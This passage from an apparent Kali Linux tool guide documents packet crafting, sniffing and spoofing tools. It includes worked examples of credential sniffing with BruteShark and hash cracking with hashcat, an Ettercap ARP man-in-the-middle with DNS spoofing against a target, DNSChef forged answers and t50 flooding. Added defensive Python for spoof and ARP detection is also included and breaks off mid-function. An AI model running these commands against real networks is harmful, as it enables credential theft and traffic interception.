--eigrp-multicast NUM EIGRP multicast sequence # (default RANDOM)
--eigrp-authentication EIGRP authentication included (default OFF)
--eigrp-auth-key-id NUM EIGRP authentication key ID (default 1)
OSPF Options:
--ospf-type NUM OSPF type (default 1)
--ospf-length NUM OSPF length (default NONE)
--ospf-router-id ADDR OSPF router ID (default RANDOM)
--ospf-area-id ADDR OSPF area ID (default 0.0.0.0)
-1,--ospf-option-MT OSPF multi-topology / TOS-based (default RANDOM)
-2,--ospf-option-E OSPF external routing capability (default RANDOM)
-3,--ospf-option-MC OSPF multicast capable (default RANDOM)
-4,--ospf-option-NP OSPF NSSA supported (default RANDOM)
-5,--ospf-option-L OSPF LLS data block contained (default RANDOM)
-6,--ospf-option-DC OSPF demand circuits supported (default RANDOM)
-7,--ospf-option-O OSPF Opaque-LSA (default RANDOM)
-8,--ospf-option-DN OSPF DOWN bit (default RANDOM)
--ospf-netmask ADDR OSPF router subnet mask (default RANDOM)
--ospf-hello-interval NUM OSPF HELLO interval (default RANDOM)
--ospf-hello-priority NUM OSPF HELLO router priority (default 1)
--ospf-hello-dead NUM OSPF HELLO router dead interval (default 360)
--ospf-hello-design ADDR OSPF HELLO designated router (default RANDOM)
--ospf-hello-backup ADDR OSPF HELLO backup designated (default RANDOM)
--ospf-neighbor NUM OSPF HELLO # of neighbor(s) (default NONE)
--ospf-address ADDR,... OSPF HELLO neighbor address(es) (default RANDOM)
--ospf-dd-mtu NUM OSPF DD MTU (default 1500)
--ospf-dd-dbdesc-MS OSPF DD master/slave bit option (default RANDOM)
--ospf-dd-dbdesc-M OSPF DD more bit option (default RANDOM)
--ospf-dd-dbdesc-I OSPF DD init bit option (default RANDOM)
--ospf-dd-dbdesc-R OSPF DD out-of-band resync (default RANDOM)
--ospf-dd-sequence NUM OSPF DD sequence # (default RANDOM)
--ospf-dd-include-lsa OSPF DD include LSA header (default OFF)
--ospf-lsa-age NUM OSPF LSA age (default 360)
--ospf-lsa-do-not-age OSPF LSA do not age (default OFF)
--ospf-lsa-type NUM OSPF LSA type (default 1)
--ospf-lsa-id ADDR OSPF LSA ID address (default RANDOM)
--ospf-lsa-router ADDR OSPF LSA advertising router (default RANDOM)
--ospf-lsa-sequence NUM OSPF LSA sequence # (default RANDOM)
--ospf-lsa-metric NUM OSPF LSA metric (default RANDOM)
--ospf-lsa-flag-B OSPF Router-LSA border router (default RANDOM)
--ospf-lsa-flag-E OSPF Router-LSA external router (default RANDOM)
--ospf-lsa-flag-V OSPF Router-LSA virtual router (default RANDOM)
--ospf-lsa-flag-W OSPF Router-LSA wild router (default RANDOM)
--ospf-lsa-flag-NT OSPF Router-LSA NSSA translation (default RANDOM)
--ospf-lsa-link-id ADDR OSPF Router-LSA link ID (default RANDOM)
--ospf-lsa-link-data ADDR OSPF Router-LSA link data (default RANDOM)
--ospf-lsa-link-type NUM OSPF Router-LSA link type (default 1)
--ospf-lsa-attached ADDR OSPF Network-LSA attached router (default RANDOM)
--ospf-lsa-larger OSPF ASBR/NSSA-LSA ext. larger (default OFF)
--ospf-lsa-forward ADDR OSPF ASBR/NSSA-LSA forward (default RANDOM)
--ospf-lsa-external ADDR OSPF ASBR/NSSA-LSA external (default RANDOM)
--ospf-vertex-router OSPF Group-LSA type router (default RANDOM)
--ospf-vertex-network OSPF Group-LSA type network (default RANDOM)
--ospf-vertex-id ADDR OSPF Group-LSA vertex ID (default RANDOM)
--ospf-lls-extended-LR OSPF LLS Extended option LR (default OFF)
--ospf-lls-extended-RS OSPF LLS Extended option RS (default OFF)
--ospf-authentication OSPF authentication included (default OFF)
--ospf-auth-key-id NUM OSPF authentication key ID (default 1)
--ospf-auth-sequence NUM OSPF authentication sequence # (default RANDOM)
■ Usage example
# Generate and send data packets for all 15 supported protocols
root@kali:~# t50 192.168.11.4 --protocol T50
[INFO] Sending 1000 packets...
[INFO] Performing stress testing...
[INFO] Hit Ctrl+C to stop...
[INFO] PID=5479
[INFO] t50 5.8.7b successfully launched at Thu Nov 21 09:04:42 2024
[INFO] t50 5.8.7b successfully finished at Thu Nov 21 09:04:42 2024
[INFO] (PID:5479) packets: 1000 (54783 bytes sent).
[INFO] (PID:5479) throughput: 95373.69 packets/second.
Network Sniffing and Spoofing
Above
Identifies the protocols of packets flowing on the network and displays information about them.
[Supported protocols]
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
VLAN (802.1Q)
S7COMM (Siemens) (SCADA)
OMRON (SCADA)
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP (SCADA)
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
SNMP (Simple Network Management Protocol)
RADIUS (Remote Authentication Dial-In User Service)
■ Usage
root@kali:~# above --help
usage: above [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
[--search-vlan]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, default: not set
--output OUTPUT File name where the traffic will be recorded, default: not set
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
--search-vlan VLAN Search
■ Usage example
# Capture packets on network interface eth0 for 120 seconds
root@kali:~# above --interface eth0 --timer 120
[...]
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SNMP Packet
[*] Attack Impact: Information Gathering
[*] Tools: snmpwalk, snmpget, snmp_enum, onesixtyone
[*] Source IP: 192.168.X.X
[*] Destination IP: 192.168.X.X
[*] SNMP Community String: public
[*] Mitigation: Restrict SNMP access, use strong community strings, monitor SNMP traffic
BruteShark
Investigates and analyzes captured packets. It can extract passwords, build a network map, reconstruct TCP sessions, and extract hashes of encrypted passwords.
■ Usage
root@kali:~# brutesharkcli --help
-d, --input-dir The input directory containing the files to be processed.
-i, --input The files to be processed separated by comma.
-m, --modules The modules to be separated by comma: Credentials, FileExtracting, NetworkMap, DNS, Voip.
-o, --output Output directory for the results files.
-p, --promiscuous Configures whether to start live capture with promiscuous mode (sometimes needs super user privileges to do so),use along with -l for live
capture.
-l, --live-capture Capture and process packets live from a network interface.
-f, --filter Set a capture BPF filter to the live traffic processing.
--help Display this help screen.
--version Display version information.
■ Usage example
# Sniff the network and collect credentials (Kerberos, NTLM, CRAM-MD5, HTTP Digest, etc.)
root@kali:~# brutesharkcli -l eth0 -m Credentials -o /root
[+] Started analyzing packets from eth0 device - Press Ctrl + C to stop
# An HTTP Digest authentication hash is detected
Found: Hash: 2001:db8::2=>2001:db8::3 (HTTP) HTTP-Digest => 1ffa22ed90f32080df6dff3f1796e117
^C
Hashes file created: /root/Hashes/Brute Shark - HTTP-Digest Hashcat Export.txt
[+] Successfully exported hashes
[+] BruteShark finished processing
# Analyze the exported file with Hashcat
root@kali:~# hashcat -a 3 "/root/Hashes/Brute Shark - HTTP-Digest Hashcat Export.txt"
hashcat (v6.2.6) starting in autodetect mode
[...]
# The hashed password is cracked
$sip$***admin*Digest Auth*GET**/**h5iIF2AiBgA=e6e78c5e7ac1d1104bc8c104e529ff0af46565d8*ZmZlZmQxZmRhY2EyNDg1ZWRmNTgzY2I1ZDQ1NzczNTE=*00000001*auth*MD5*1ffa22ed90f32080df6dff3f1796e117:pass
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 11400 (SIP digest authentication (MD5))
Hash.Target......: $sip$***admin*Digest Auth*GET**/**h5iIF2AiBgA=e6e78...96e117
Time.Started.....: Wed Sep 18 09:13:29 2024 (0 secs)
Time.Estimated...: Wed Sep 18 09:13:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?1?2?2?2 [4]
Guess.Charset....: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*!$@_, -4 Undefined
Guess.Queue......: 4/15 (26.67%)
Speed.#1.........: 39098.6 kH/s (4.07ms) @ Accel:512 Loops:62 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 253952/2892672 (8.78%)
Rejected.........: 0/253952 (0.00%)
Restore.Point....: 0/46656 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-62 Iteration:0-62
Candidate.Engine.: Device Generator
Candidates.#1....: sari -> Xbbi
On Windows, a GUI is also available.
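The hashcat line above is crackable offline because an HTTP Digest exchange (RFC 2617) leaks every input to the response except the password: once the sniffer has username, realm, nonce, cnonce, nc, qop and the method/URI, recomputing the MD5 chain for each candidate is all an attacker needs, which is why Digest over plain HTTP belongs on the "migrate to TLS" list. The following Python is an added example, not code from the page, BruteShark or hashcat: it parses the hashcat mode 11400 (`$sip$`) layout the page shows, recomputes the response for a candidate password, and compares. `make_sample_line()` builds a constructed capture with a response computed here; the nonce and cnonce values in it are made up.

```python
import hashlib

# Field order of a hashcat 11400 ($sip$) line, as in the page's example.
FIELDS = ["uri_server", "uri_client", "username", "realm", "method", "uri_prefix",
          "uri_resource", "uri_suffix", "nonce", "cnonce", "nc", "qop", "directive", "response"]


def parse_sip_line(line: str) -> dict:
    """Split a $sip$ line into named fields; a trailing ':password' (added by hashcat
    after a successful crack) is dropped."""
    body = line.split(":", 1)[0]
    if not body.startswith("$sip$*"):
        raise ValueError("not a hashcat 11400 ($sip$) line")
    parts = body[len("$sip$*"):].split("*")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def digest_response(f: dict, password: str) -> str:
    """RFC 2617 response = MD5(HA1:nonce:nc:cnonce:qop:HA2) for qop=auth,
    with HA1 = MD5(user:realm:password) and HA2 = MD5(method:uri)."""
    md5 = lambda s: hashlib.md5(s.encode()).hexdigest()
    if f["directive"] != "MD5":
        raise NotImplementedError("only the plain MD5 directive is handled here (not MD5-sess)")
    ha1 = md5(f"{f['username']}:{f['realm']}:{password}")
    uri = f["uri_prefix"] + f["uri_resource"] + f["uri_suffix"]
    ha2 = md5(f"{f['method']}:{uri}")
    if f["qop"] == "auth":
        return md5(f"{ha1}:{f['nonce']}:{f['nc']}:{f['cnonce']}:{f['qop']}:{ha2}")
    if f["qop"] == "":
        return md5(f"{ha1}:{f['nonce']}:{ha2}")   # legacy RFC 2069 form without qop
    raise NotImplementedError("qop=auth-int needs the entity body, which a $sip$ line lacks")


def check_password(line: str, candidate: str) -> bool:
    """True when the candidate password reproduces the captured response."""
    f = parse_sip_line(line)
    return digest_response(f, candidate) == f["response"].lower()


def make_sample_line(password: str) -> str:
    """Constructed capture (not from the page): same layout as the page's line, with
    made-up nonce/cnonce values and a response computed by digest_response()."""
    f = dict(zip(FIELDS, ["", "", "admin", "Digest Auth", "GET", "", "/", "",
                          "c29tZS1ub25jZQ==", "Y2xpZW50LW5vbmNl", "00000001", "auth", "MD5", ""]))
    f["response"] = digest_response(f, password)
    return "$sip$*" + "*".join(f[k] for k in FIELDS)


# The line BruteShark exported on the page, kept verbatim for the parser demo.
PAGE_LINE = ("$sip$***admin*Digest Auth*GET**/**h5iIF2AiBgA=e6e78c5e7ac1d1104bc8c104e529ff0af46565d8"
             "*ZmZlZmQxZmRhY2EyNDg1ZWRmNTgzY2I1ZDQ1NzczNTE=*00000001*auth*MD5*1ffa22ed90f32080df6dff3f1796e117")

if __name__ == "__main__":
    f = parse_sip_line(PAGE_LINE)
    print(f"user={f['username']!r} realm={f['realm']!r} uri={f['uri_resource']!r} qop={f['qop']!r}")
    sample = make_sample_line("pass")
    for cand in ("Password1", "pass"):
        print(f"candidate {cand!r}: {'match' if check_password(sample, cand) else 'no match'}")
```

Everything the verifier needs is in the capture, so the defence is not a stronger password hash but removing the plaintext exposure: serve the application over TLS, or replace Digest with a modern scheme; the same reasoning applies to the other credential types BruteShark extracts.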
Chaosreader
Analyzes captured data in network traffic logs and writes the sessions and file data of various application protocols (HTTP, FTP, ...) to a report.
■ Usage
root@kali:~# chaosreader --help
USAGE: chaosreader [-adehiknqrvxAHIRTUXY] [-D dir]
[-b port[,...]] [-B port[,...]]
[-j IPaddr[,...]] [-J IPaddr[,...]]
[-l port[,...]] [-L port[,...]] [-m bytes[k]]
[-M bytes[k]] [-o "time"|"size"|"type"|"ip"]
[-p port[,...]] [-P port[,...]]
infile [infile2 ...]
chaosreader -s [mins] | -S [mins[,count]]
[-z] [-f 'filter']
chaosreader # Create application session files, indexes
-a, --application # Create application session files (default)
-d, --preferdns # Show DNS names instead of IP addresses
-e, --everything # Create HTML 2-way & hex files for everything
-h # Print a brief help
--help # Print verbose help (this) and version
--help2 # Print massive help
-i, --info # Create info file
-q, --quiet # Quiet, no output to screen
-r, --raw # Create raw files
-v, --verbose # Verbose - Create ALL files .. (except -e)
-x, --index # Create index files (default)
-A, --noapplication # Exclude application session files
-H, --hex # Include hex dumps (slow)
-I, --noinfo # Exclude info files
-R, --noraw # Exclude raw files
-T, --notcp # Exclude TCP traffic
-U, --noudp # Exclude UDP traffic
-Y, --noicmp # Exclude ICMP traffic
-X, --noindex # Exclude index files
-k, --keydata # Create extra files for keystroke analysis
-n, --names # Include hostnames in hyperlinked HTTPlog (HTML)
-D dir --dir dir # Output all files to this directory
-b 25,79 --playtcp 25,79 # replay these TCP ports as well (playback)
-B 36,42 --playudp 36,42 # replay these UDP ports as well (playback)
-l 7,79 --htmltcp 7,79 # Create HTML for these TCP ports as well
-L 7,123 --htmludp 7,123 # Create HTML for these UDP ports as well
-m 1k --min 1k # Min size of connection to save ("k" for Kb)
-M 1024k --max 1k # Max size of connection to save ("k" for Kb)
-o size --sort size # sort Order: time/size/type/ip (Default time)
-p 21,23 --port 21,23 # Only examine these ports (TCP & UDP)
-P 80,81 --noport 80,81 # Exclude these ports (TCP & UDP)
-s 5 --runonce 5 # Standalone. Run tcpdump/snoop for 5 mins.
-S 5,10 --runmany 5,10 # Standalone, many. 10 samples of 5 mins each.
-S 5 --runmany 5 # Standalone, endless. 5 min samples forever.
-z --runredo # Standalone, redo. Rereads last run's logs.
-j 10.1.2.1 --ipaddr 10.1.2.1 # Only examine these IPs
-J 10.1.2.1 --noipaddr 10.1.2.1 # Exclude these IPs
-f 'port 7' --filter 'port 7' # With standalone, use this dump filter.
■ Usage example
root@kali:~# chaosreader -D report out.pcap
Opening, out.pcap
Reading file contents,
100% (108476/108476)
Reassembling packets,
100% (868/868)
index.html created.
The generated HTML report
darkstat
Monitors packets flowing through a network interface and displays traffic graphs and statistics.
■ Usage
root@kali:~# darkstat --help
usage: darkstat [ -i interface ]
[ -f filter ]
[ -r capfile ]
[ -p port ]
[ -b bindaddr ]
[ -l network/netmask ]
[ --base path ]
[ --local-only ]
[ --snaplen bytes ]
[ --pppoe ]
[ --syslog ]
[ --verbose ]
[ --no-daemon ]
[ --no-promisc ]
[ --no-dns ]
[ --no-macs ]
[ --no-lastseen ]
[ --chroot dir ]
[ --user username ]
[ --daylog filename ]
[ --import filename ]
[ --export filename ]
[ --pidfile filename ]
[ --hosts-max count ]
[ --hosts-keep count ]
[ --ports-max count ]
[ --ports-keep count ]
[ --highest-port port ]
[ --wait secs ]
[ --hexdump ]
[ --version ]
[ --help ]
■ Usage example
# Monitor network interface eth0
root@kali:~# darkstat -i eth0
A web server starts on port 667, so the results can be viewed in a browser.
DNSChef
Provides a DNS spoofing server (DNS proxy).
■ Usage
root@kali:~# dnschef --help
usage: dnschef [options]:
options:
-h, --help show this help message and exit
--fakedomains thesprawl.org,google.com
A comma separated list of domain names which will be resolved to FAKE values specified in the the above parameters. All other domain names
will be resolved to their true values.
--truedomains thesprawl.org,google.com
A comma separated list of domain names which will be resolved to their TRUE values. All other domain names will be resolved to fake values
specified in the above parameters.
Fake DNS records::
--fakeip 192.0.2.1 IP address to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'A' queries will be
spoofed. Consider using --file argument if you need to define more than one IP address.
--fakeipv6 2001:db8::1
IPv6 address to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'AAAA' queries will be
spoofed. Consider using --file argument if you need to define more than one IPv6 address.
--fakemail mail.fake.com
MX name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'MX' queries will be spoofed.
Consider using --file argument if you need to define more than one MX record.
--fakealias www.fake.com
CNAME name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'CNAME' queries will be
spoofed. Consider using --file argument if you need to define more than one CNAME record.
--fakens ns.fake.com NS name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'NS' queries will be spoofed.
Consider using --file argument if you need to define more than one NS record.
--file FILE Specify a file containing a list of DOMAIN=IP pairs (one pair per line) used for DNS responses. For example: google.com=1.1.1.1 will force
all queries to 'google.com' to be resolved to '1.1.1.1'. IPv6 addresses will be automatically detected. You can be even more specific by
combining --file with other arguments. However, data obtained from the file will take precedence over others.
Optional runtime parameters.:
--logfile FILE Specify a log file to record all activity
--nameservers 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
A comma separated list of alternative DNS servers to use with proxied requests. Nameservers can have either IP or IP#PORT format. A
randomly selected server from the list will be used for proxy requests when provided with multiple servers. By default, the tool uses
Google's public DNS server 8.8.8.8 when running in IPv4 mode and 2001:4860:4860::8888 when running in IPv6 mode.
-i 127.0.0.1 or ::1, --interface 127.0.0.1 or ::1
Define an interface to use for the DNS listener. By default, the tool uses 127.0.0.1 for IPv4 mode and ::1 for IPv6 mode.
-t, --tcp Use TCP DNS proxy instead of the default UDP.
-6, --ipv6 Run in IPv6 mode.
-p 53, --port 53 Port number to listen for DNS requests.
-q, --quiet Don't show headers.
■ Usage example
# Start the DNS proxy
root@kali:~# dnschef --fakeip 127.0.0.1 --fakeipv6 2001:db8::1
[...]
(07:04:40) [*] DNSChef started on interface: 127.0.0.1
(07:04:40) [*] Using the following nameservers: 8.8.8.8
(07:04:40) [*] Cooking all A replies to point to 127.0.0.1
(07:04:40) [*] Cooking all AAAA replies to point to 2001:db8::1
# Query the DNS proxy (add `nameserver 127.0.0.1` to `/etc/resolv.conf` beforehand)
root@kali:~# nslookup google.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: google.com
Address: 127.0.0.1
Name: google.com
Address: 2001:db8::1
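What the nslookup output above shows is a resolver "cooking" A and AAAA answers: google.com comes back as 127.0.0.1 and 2001:db8::1. As an added example, not code from the page or the DNSChef project, the Python below parses DNS responses from the wire format (including compression pointers) and applies two heuristics a defender can run over resolver logs or a capture to catch this: an address answer for a public name that is not globally routable (loopback, RFC 1918, link-local, documentation ranges), and many unrelated names resolving to one address, which is what `--fakeip` without `--fakedomains` produces. The `build_response()` helper, the transaction IDs and the answer data are constructed here for the demo; `dns.google -> 8.8.8.8` is used as the genuine case.

```python
import ipaddress
import struct


def _encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in name.rstrip(".").split(".")) + b"\x00"


def build_response(tid: int, qname: str, records) -> bytes:
    """Constructed test-data builder: one question (QTYPE ANY) plus (rtype, address) answers.
    The answer names are compression pointers (0xC00C) to the question name at offset 12."""
    msg = struct.pack("!6H", tid, 0x8180, 1, len(records), 0, 0)   # QR=1, RD=1, RA=1
    msg += _encode_name(qname) + struct.pack("!HH", 255, 1)
    for rtype, addr in records:
        rdata = ipaddress.ip_address(addr).packed
        msg += struct.pack("!HHHIH", 0xC00C, rtype, 1, 60, len(rdata)) + rdata
    return msg


def _read_name(msg: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def parse_response(msg: bytes) -> dict:
    """Parse header, question section and answer section of a DNS response."""
    tid, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = _read_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype in (1, 28):
            answers.append((name, {1: "A", 28: "AAAA"}[rtype], str(ipaddress.ip_address(rdata))))
        else:
            answers.append((name, str(rtype), rdata.hex()))
    return {"id": tid, "flags": flags, "questions": questions, "answers": answers}


LOCAL_SUFFIXES = (".local", ".lan", ".home", ".internal", ".localhost")


def suspicious_answers(resp: dict) -> list:
    """Heuristic 1: a public name answered with a non-global address."""
    out = []
    for name, rtype, value in resp["answers"]:
        if rtype not in ("A", "AAAA") or name.lower().endswith(LOCAL_SUFFIXES):
            continue
        if not ipaddress.ip_address(value).is_global:
            out.append(f"{name} {rtype} -> {value}: non-global address for a public name")
    return out


def shared_answer_ips(responses, min_names: int = 3) -> dict:
    """Heuristic 2: one address serving many unrelated names (cooked 'all A replies')."""
    names_by_ip = {}
    for r in responses:
        for name, rtype, value in r["answers"]:
            if rtype in ("A", "AAAA"):
                names_by_ip.setdefault(value, set()).add(name.lower())
    return {ip: sorted(n) for ip, n in names_by_ip.items() if len(n) >= min_names}


# Constructed responses: the page's cooked google.com answers, and one genuine-looking reply.
SPOOFED = build_response(0x1234, "google.com", [(1, "127.0.0.1"), (28, "2001:db8::1")])
GENUINE = build_response(0x1235, "dns.google", [(1, "8.8.8.8")])

if __name__ == "__main__":
    for raw in (SPOOFED, GENUINE):
        r = parse_response(raw)
        print(r["questions"], r["answers"], suspicious_answers(r))
    many = [build_response(i, f"site{i}.example", [(1, "127.0.0.1")]) for i in range(3)]
    print(shared_answer_ips([parse_response(m) for m in many]))
```

The heuristics are deliberately conservative: internal names legitimately resolve to private space, so the suffix allow-list has to match the environment, and a split-horizon DNS design will trip the second heuristic unless the threshold is tuned.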
Ettercap
Provides various functions for carrying out man-in-the-middle attacks.
■ Usage
root@kali:~# ettercap --help
Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)
Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don't sniff, only perform the mitm attack
-b, --broadcast sniff packets destined to broadcast
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-S, --nosslmitm do not forge SSL certificates
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)
--certificate <file> certificate file to use for SSL MiTM
--private-key <file> private key file to use for SSL MiTM
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-D, --daemon daemonize ettercap (no GUI)
-G, --gtk use GTK+ GUI
Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files
Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password
LUA options:
--lua-script <script1>,[<script2>,...] comma-separted list of LUA scripts
--lua-args n1=v1,[n2=v2,...] comma-separated arguments to LUA script(s)
General options:
-i, --iface <iface> use this network interface
-I, --liface show all the network interfaces
-Y, --secondary <ifaces> list of secondary network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-A, --address <address> force this local <address> on iface
-P, --plugin <plugin> launch this <plugin> - multiple occurance allowed
--plugin-list <plugin1>,[<plugin2>,...] comma-separated list of plugins
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-6, --ip6scan send ICMPv6 probes to discover IPv6 nodes on the link
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wifi-key <wkey> use this key to decrypt wifi packets (wep or wpa)
-a, --config <config> use the alternative config file <config>
Standard options:
-v, --version prints the version and exit
-h, --help this help screen
■ Usage example
# Point the A record for google.com at the attacker host's IP address
root@kali_1:~# echo "google.com A 192.168.11.3" >> /etc/ettercap/etter.dns
# Run DNS spoofing against the target host
root@kali_1:~# ettercap -T -i eth0 -P dns_spoof -M arp:remote /192.168.11.1// /192.168.11.4//
ettercap 0.8.3.1 copyright 2001-2020 Ettercap Development Team
Listening on:
eth0 -> 02:42:AC:13:00:02
192.168.11.4/255.255.0.0
[...]
# A request to google.com from the target host (it is answered by the web server set up on the attacker host)
root@kali_2:~# curl -L --head http://google.com
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 03:36:29 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.1.31
Content-Type: text/html; charset=UTF-8
HexInject
Sniffs and injects packets in hexadecimal form.
■ Usage
root@kali:~# hexinject -h
Usage:
hexinject <mode> <options>
Options:
-s sniff mode
-p inject mode
-r raw mode (instead of the default hexadecimal mode)
-f <filter> custom pcap filter
-i <device> network device to use
-F <file> pcap file to use as device (sniff mode only)
-c <count> number of packets to capture
-t <time> sleep time in microseconds (default 100)
-I list all available network devices
Injection options:
-C disable automatic packet checksum
-S disable automatic packet size fields
Interface options:
-P disable promiscuous mode
-M put the wireless interface in monitor mode
(experimental: use airmon-ng instead of this...)
Other options:
-h help screen
■ Usage example
# Sniff ARP packets (hex mode) and extract the IP addresses
root@kali:~# hexinject -s -i eth0 -f 'arp' | awk -W interactive '{ printf("%d.%d.%d.%d\n", "0x"$29, "0x"$30, "0x"$31, "0x"$32); }'
# While sniffing, display the ARP table
root@kali:~# arp
# The IP addresses are printed
root@kali:~# hexinject -s -i eth0 -f 'arp' | awk -W interactive '{ printf("%d.%d.%d.%d\n", "0x"$29, "0x"$30, "0x"$31, "0x"$32); }'
192.168.11.1
192.168.11.3
192.168.11.3
192.168.11.1
---------------------
# Sniff packets (raw mode) and extract the Host header of HTTP traffic
root@kali:~# hexinject -s -i eth0 -r | stdbuf -o0 strings | grep 'Host:'
# While sniffing, send HTTP requests
root@kali:~# curl -H 'Host: example.com' http://example.com/
root@kali:~# curl -L -H 'Host: google.com' https://google.com/
# The Host header values are printed
root@kali:~# hexinject -s -i eth0 -r | stdbuf -o0 strings | grep 'Host:'
Host: example.com
Host: google.com
Host: www.google.com
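The awk one-liner in the HexInject example works because hexinject prints one space-separated hex byte per field: the 14-byte Ethernet header occupies fields 1-14, the ARP header fields 15-22, the sender MAC 23-28, and the sender IPv4 address fields 29-32. The same frame layout is what the Ettercap `-M arp:remote` example manipulates: the target learns a new MAC for the gateway's IP. As an added example serving both sections (not code from the page, hexinject or ettercap), the Python below parses ARP frames from hexinject-style hex lines and keeps an IP-to-MAC table, alerting when a binding changes; that is the core of classic ARP-spoof detection as done by tools such as arpwatch. The MAC addresses, IP addresses and frame sequence in `demo()` are constructed for the demo.

```python
import ipaddress

# Constructed addresses for the demo (the attacker MAC mirrors the one in the page's
# ettercap output, the rest are made up).
GW_MAC, HOST_MAC, EVIL_MAC = "02:42:ac:13:00:01", "02:42:ac:13:00:04", "02:42:ac:13:00:02"


def make_arp_hex(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str,
                 dst_mac: str = "ff:ff:ff:ff:ff:ff") -> str:
    """Constructed Ethernet+ARP frame, rendered as space-separated hex bytes
    the way hexinject -s prints captured packets."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip = lambda a: ipaddress.IPv4Address(a).packed
    frame = mac(dst_mac) + mac(sender_mac) + b"\x08\x06"                  # Ethernet, type ARP
    frame += b"\x00\x01\x08\x00\x06\x04" + op.to_bytes(2, "big")          # htype, ptype, hlen, plen, oper
    frame += mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip)
    return " ".join(f"{b:02x}" for b in frame)


def parse_arp_hex(line: str):
    """Decode one hexinject-style line; None if it is not ARP over Ethernet."""
    raw = bytes.fromhex(line)           # bytes.fromhex skips the whitespace between bytes
    if len(raw) < 42 or raw[12:14] != b"\x08\x06":
        return None
    op = int.from_bytes(raw[20:22], "big")
    return {
        "op": {1: "request", 2: "reply"}.get(op, f"op{op}"),
        "sender_mac": raw[22:28].hex(":"),
        "sender_ip": str(ipaddress.IPv4Address(raw[28:32])),   # bytes 29-32: the awk fields above
        "target_mac": raw[32:38].hex(":"),
        "target_ip": str(ipaddress.IPv4Address(raw[38:42])),
    }


class ArpWatch:
    """Remember the first MAC seen for each sender IP and report later changes.
    Changes to a protected address (the default gateway) are rated HIGH."""

    def __init__(self, protected_ips=()):
        self.table = {}
        self.protected = set(protected_ips)
        self.alerts = []

    def feed(self, hex_line: str):
        pkt = parse_arp_hex(hex_line)
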